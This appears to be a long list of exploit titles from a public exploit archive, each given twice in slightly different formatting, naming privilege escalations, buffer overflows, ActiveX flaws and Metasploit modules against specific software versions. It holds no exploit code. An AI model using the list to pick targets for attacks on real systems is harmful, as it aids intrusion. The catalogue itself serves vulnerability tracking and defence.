Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow Microsoft SQL Server - 'sp_replwritetovarbin()' Heap Overflow PHP 5.2.8 gd library - imageRotate() Information Leak PHP 5.2.8 gd library - 'imageRotate()' Information Leak Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Adobe Acrobat Reader 8.1.2 < 9.0 - 'getIcon()' Memory Corruption PHP - mb_ereg(i)_replace() Evaluate Replacement String PHP - 'mb_ereg(i)_replace()' Evaluate Replacement String Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) FreeBSD 6.1 - kqueue() Null Pointer Dereference Privilege Escalation Multiple BSD Operating Systems - setusercontext() Vulnerabilities Avast! 4.8.1335 Professional - Local Kernel Buffer Overflow FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation Multiple BSD Operating Systems - 'setusercontext()' Vulnerabilities Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow (SEH) OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2) Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2) Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflows (SEH) Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflows (SEH) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3) Linux Kernel 2.4/2.6 - 'sock_sendpage()' Privilege Escalation (3) PlayMeNow 7.3 / 7.4 - Malformed '.M3U' Playlist File Buffer PlayMeNow 7.3/7.4 - Malformed '.M3U' Playlist File Buffer Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit) PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit) HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow (Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation (Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Privilege Escalation PHP 6.0 Dev - str_transliterate() Buffer Overflow PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - OpenSession() Buffer Overflow Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow FreeBSD Kernel - nfs_mount() Exploit FreeBSD Kernel - 'nfs_mount()' Exploit MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH) Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH) MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH) Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH) FreeBSD - mbufs() sendfile Cache Poisoning Privilege Escalation FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - CAN BCM Privilege Escalation Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Privilege Escalation AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit) AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit) Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit) Adobe - 'Collab.collectEmailInfo()' Buffer Overflow (Metasploit) NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow NetOp Remote Control 8.0/9.1/9.2/9.5 - Buffer Overflow PHP 5.3.5 - socket_connect() Buffer Overflow PHP 5.3.5 - 'socket_connect()' Buffer Overflow Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Privilege Escalation mount.cifs - chdir() Arbitrary Root File Identification mount.cifs - 'chdir()' Arbitrary Root File Identification Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (1) Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2) Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (1) Slackware Linux 3.1/3.2 - color_xterm Buffer Overflow (2) Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - vsyslog() Buffer Overflow Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2) RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (2) QSSL QNX 4.25 A - crypt() Exploit QSSL QNX 4.25 A - 'crypt()' Exploit Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 _XAsyncReply() Stack Corruption X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 '_XAsyncReply()' Stack Corruption Linux Kernel 2.2.x - sysctl() Memory Reading (PoC) Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC) Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1) Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2) Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1) Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2) Linux Kernel 2.2 / 2.4 - procfs Stream redirection to Process Memory Privilege Escalation Linux Kernel 2.2/2.4 - procfs Stream redirection to Process Memory Privilege Escalation Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Privilege Escalation Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation (PoC) Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC) Python 1.5.2 Pickle - Unsafe eval() Code Execution Python 1.5.2 Pickle - Unsafe 'eval()' Code Execution Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (1) Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (2) Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (3) Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1) Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2) Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3) ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2) Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1) Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2) Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence Linux Kernel 2.2.x/2.4.x - I/O System Call File Existence Zblast 1.2 - Local 'Username' Buffer Overrun Zblast 1.2 - 'Username' Local Buffer Overrun Linux PAM 0.77 - Pam_Wheel Module getlogin() 'Username' Spoofing Privilege Escalation Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun Elm 2.3/2.4 - TERM Environment Variable Local Buffer Overrun GNU AN - Local Command Line Option Buffer Overflow GNU AN - Command Line Option Local Buffer Overflow OpenBSD 3.3 - Semget() Integer Overflow (1) OpenBSD 3.3 - Semget() Integer Overflow (2) OpenBSD 3.3 - 'Semget()' Integer Overflow (1) OpenBSD 3.3 - 'Semget()' Integer Overflow (2) Sendmail 8.12.9 - Prescan() Variant Remote Buffer Overrun Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (1) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (2) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (3) Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1) Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2) Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3) Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read HP-UX 7-11 - Local X Font Server Buffer Overflow HP-UX 7-11 - X Font Server Local Buffer Overflow Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1) Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1) Photodex ProShow Gold/Producer 5.0.3310 / 6.0.3410 - ScsiAccess Privilege Escalation Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - ScsiAccess Privilege Escalation Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities Newsgrab 0.5.0pre4 - Local/Remote Multiple Vulnerabilities Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1) Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1) Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation Ophcrack 3.5.0 - Local Code Execution Buffer Overflow Ophcrack 3.5.0 - Code Execution Local Buffer Overflow PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass PHP 4.x/5.0/5.1 - 'mb_send_mail()' Function Parameter Restriction Bypass Linux Kernel 2.4.x / 2.5.x / 2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities IBM AIX 6.1 / 7.1 - Privilege Escalation IBM AIX 6.1/7.1 - Privilege Escalation Nodejs - js-yaml load() Code Exec (Metasploit) Nodejs - 'js-yaml load()' Code Exec (Metasploit) PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass Exploit Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3) Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3) Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution Microsoft Office 2007/2010 - OLE Arbitrary Command Execution MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit) ImageMagick 6.9.3-9/7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit) Proxifier for Mac 2.17 / 2.18 - Privesc Escalation Proxifier for Mac 2.17/2.18 - Privesc Escalation Sendmail 8.12.8 - Prescan() BSD Remote Command Execution Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution BFTPd - vsprintf() Format Strings Exploit BFTPd - 'vsprintf()' Format Strings Exploit OpenBSD ftpd 2.6 / 2.7 - Remote Exploit OpenBSD ftpd 2.6/2.7 - Remote Exploit Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit Rlpr 2.04 - msg() Remote Format String Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Exploit Rlpr 2.04 - 'msg()' Remote Format String Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String Courier-IMAP 3.0.2-r1 - 'auth_debug()' Remote Format String PHP 4.3.7 - openlog() Buffer Overflow PHP 4.3.7 - 'openlog()' Buffer Overflow Apple iTunes - Playlist Local Parsing Buffer Overflow Apple iTunes - Playlist Parsing Local Buffer Overflow Newspost 2.1 - socket_getline() Remote Buffer Overflow (2) Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2) CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit) CA Unicenter 3.1 - CAM 'log_security()' Stack Overflow (Metasploit) sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String sobexsrv 1.0.0_pre3 Bluetooth - 'syslog()' Remote Format String Mozilla Firefox 1.04 - compareTo() Remote Code Execution Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit) Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit) Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit) Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit) crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage Exploit Quake 3 Engine 1.32b - 'R_RemapShader()' Remote Client Buffer Overflow iShopCart - vGetPost() Remote Buffer Overflow (cgi) iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI) Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Exploit XMPlay 3.3.0.4 - (PLS) Local+Remote Buffer Overflow Oracle 9i / 10g - (read/write/execute) Exploitation Suite XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow Oracle 9i/10g - (read/write/execute) Exploitation Suite Oracle 9i / 10g (extproc) - Local / Remote Command Execution Oracle 9i / 10g - 'utl_file' FileSystem Access Exploit Oracle 9i/10g - 'extproc' Local/Remote Command Execution Oracle 9i/10g - 'utl_file' FileSystem Access Exploit Portable OpenSSH 3.6.1p-PAM / 4.1-SuSE - Timing Attack Exploit Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack Exploit PHP 4.4.3 < 4.4.6 - PHPinfo() Cross-Site Scripting PHP 4.4.3 < 4.4.6 - 'PHPinfo()' Cross-Site Scripting XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Buffer Overflow Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit Zenturi ProgramChecker - 'ActiveX NavigateUrl()' Insecure Method Exploit NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()/ Insecure Method HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - SaveToFile() Exploit HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' Exploit NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow Versalsoft HTTP File Uploader - AddFile() Remote Buffer Overflow Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow Data Dynamics ActiveReport ActiveX - 'actrpt2.dll 2.5' Insecure Method Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow CHILKAT ASP String - 'CkString.dll 1.1' SaveToFile() Insecure Method Yahoo! Widget < 4.0.5 - 'GetComponentVersion()' Remote Overflow CHILKAT ASP String - 'CkString.dll 1.1' 'SaveToFile()' Insecure Method NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - SetText() Remote Exploit NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - SaveXMLFile() Insecure Method NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - DeleteXMLFile() Insecure Method NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote Exploit NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method Microsoft MSN Messenger 7.x (8.0?) - Video Remote Heap Overflow Microsoft MSN Messenger 7.x/8.0? - Video Remote Heap Overflow GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow GlobalLink 2.7.0.8 - 'glItemCom.dll' 'SetInfo()' Heap Overflow GlobalLink 2.7.0.8 - 'glitemflat.dll' SetClientInfo() Heap Overflow Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method GlobalLink 2.7.0.8 - 'glitemflat.dll' 'SetClientInfo()' Heap Overflow Ultra Crypto Component - 'CryptoX.dll 2.0' 'SaveToFile()' Insecure Method jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution Persits Software XUpload Control - AddFolder() Buffer Overflow Persits Software XUpload Control - 'AddFolder()' Buffer Overflow idautomation bar code ActiveX - Multiple Vulnerabilities idautomation bar code - ActiveX Multiple Vulnerabilities C6 Messenger ActiveX - Remote Download and Execute Exploit C6 Messenger - ActiveX Remote Download and Execute Exploit NuMedia Soft Nms DVD Burning SDK ActiveX - 'NMSDVDX.dll' Exploit NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Exploit GdPicture Pro ActiveX - 'gdpicture4s.ocx' File Overwrite / Exec Exploit GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec Exploit MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit MW6 Aztec - ActiveX 'Aztec.dll' Remote Insecure Method Exploit MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method Exploit GE Fanuc Real Time Information Portal 2.6 - writeFile() API Exploit (Metasploit) GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit) EasyMail ActiveX - 'emmailstore.dll 6.5.0.3' Buffer Overflow EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Buffer Overflow Megacubo 5.0.7 - (mega://) Remote eval() Injection Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method Oracle Secure Backup 10g - exec_qr() Command Injection Oracle Secure Backup 10g - 'exec_qr()' Command Injection Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow Adobe Reader 8.1.4/9.1 - 'GetAnnots()' Remote Code Execution Adobe 8.1.4/9.1 - 'customDictionaryOpen()' Code Execution BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow AOL IWinAmpActiveX Class - 'ConvertFile()' Remote Buffer Overflow Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities Virtualmin < 3.703 - Local/Remote Multiple Vulnerabilities Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow EnjoySAP 6.4 / 7.1 - File Overwrite EnjoySAP 6.4/7.1 - File Overwrite Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit) Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit) mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit) mDNSResponder 10.4.0/10.4.8 (OSX) - UPnP Location Overflow (Metasploit) Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit) Opera 9.50/9.61 historysearch - Command Execution (Metasploit) Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit) PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit) PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit) Borland Interbase 2007/2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit) Borland Interbase 2007/2007 SP2 - 'jrd8_create_database' Buffer Overflow (Metasploit) Borland Interbase 2007/2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit) HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit) HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit) PHP 5.3 - preg_match() Full Path Disclosure PHP 5.3 - 'preg_match()' Full Path Disclosure Trend Micro Web-Deployment ActiveX - Remote Execution (PoC) Trend Micro Web-Deployment - ActiveX Remote Execution (PoC) Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' 'OpenFile()' Remote Overflow Bigant Messenger 2.52 - 'AntCore.dll' RegisterCom() Remote Heap Overflow Bigant Messenger 2.52 - 'AntCore.dll' 'RegisterCom()' Remote Heap Overflow Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution Apple Safari 4.0.5 - 'parent.close()' Memory Corruption Code Execution Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass) Apple Safari 4.0.5 - 'parent.close()' Memory Corruption (ASLR + DEP Bypass) ComponentOne VSFlexGrid 7 / 8 - 'Archive()' method Remote Buffer Overflow ComponentOne VSFlexGrid 7/8 - 'Archive()' method Remote Buffer Overflow Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Buffer Overflow Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass) SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass) McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution) McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (2) Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (Metasploit) Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit) Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Buffer Overflow (Metasploit) Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Buffer Overflow Microsoft WMITools ActiveX - Remote Command Execution Microsoft WMITools - ActiveX Remote Command Execution Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256) Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Exploit Apple QTJava - toQTPointer() Arbitrary Memory Access (Metasploit) Apple QTJava - 'toQTPointer()' Arbitrary Memory Access (Metasploit) Java - Statement.invoke() Trusted Method Chain Exploit (Metasploit) Java - 'Statement.invoke()' Trusted Method Chain Exploit (Metasploit) Mozilla Firefox 3.5 - escape() Return Value Memory Corruption (Metasploit) Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit) Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution (Metasploit) Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit) Sun Solaris sadmind - adm_build_path() Buffer Overflow (Metasploit) Sun Solaris sadmind - 'adm_build_path()' Buffer Overflow (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit) Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit) Firebird Relational Database - 'SVC_attach()' Buffer Overflow (Metasploit) Firebird Relational Database - isc_create_database() Buffer Overflow (Metasploit) Firebird Relational Database - 'isc_create_database()' Buffer Overflow (Metasploit) Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit) Firebird Relational Database - 'isc_attach_database()' Buffer Overflow (Metasploit) Worldweaver DX Studio Player 3.0.29 - shell.execute() Command Execution (Metasploit) Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution 